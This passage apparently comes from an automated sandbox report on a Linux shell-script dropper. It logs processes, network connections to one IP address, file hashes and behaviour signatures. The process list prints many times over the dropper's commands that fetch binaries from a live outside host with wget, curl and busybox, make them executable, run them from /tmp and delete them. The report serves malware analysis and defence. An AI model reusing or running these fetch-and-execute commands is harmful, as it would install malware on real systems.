[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/chmod

[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L

[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/rm

[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/wget

[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/chmod

[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG

[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/rm

[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/wget

[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/chmod

[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt

[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/rm

[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/wget

[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/chmod

[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS

[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/rm

[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/wget

[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/chmod

[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd

[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/rm

[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/wget

[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/chmod

[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS

[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/rm

[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/chmod

[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/rm

[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/wget

[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/chmod

[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed

[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/rm

[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/wget

[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/chmod

[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE

[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/rm

[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/wget

[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/chmod

[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ

[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/rm

[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/chmod

[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi

[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/rm

[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/wget

[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/chmod

[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak

[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/rm

[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/wget

[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/chmod

[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ

[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/rm

[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/chmod

[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F

[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/rm

[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/wget

[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/chmod

[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L

[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/rm

[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/wget

[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/chmod

[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG

[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/rm

[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/wget

[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/chmod

[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt

[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/rm

[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/837-1-0xb66fb000-0xb670c044-memory.dmp

memory/861-2-0xb670d000-0xb671e044-memory.dmp

memory/914-3-0xb66da000-0xb66eb044-memory.dmp

memory/920-4-0xb66dc000-0xb66ed044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-14 02:38

Reported

2024-11-14 02:41

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A

Processes

/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/chmod

[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/rm

[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/wget

[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/chmod

[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS

[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/rm

[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/wget

[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/chmod

[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd

[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/rm

[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/wget

[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/chmod

[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS

[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/rm

[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/wget

[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/curl

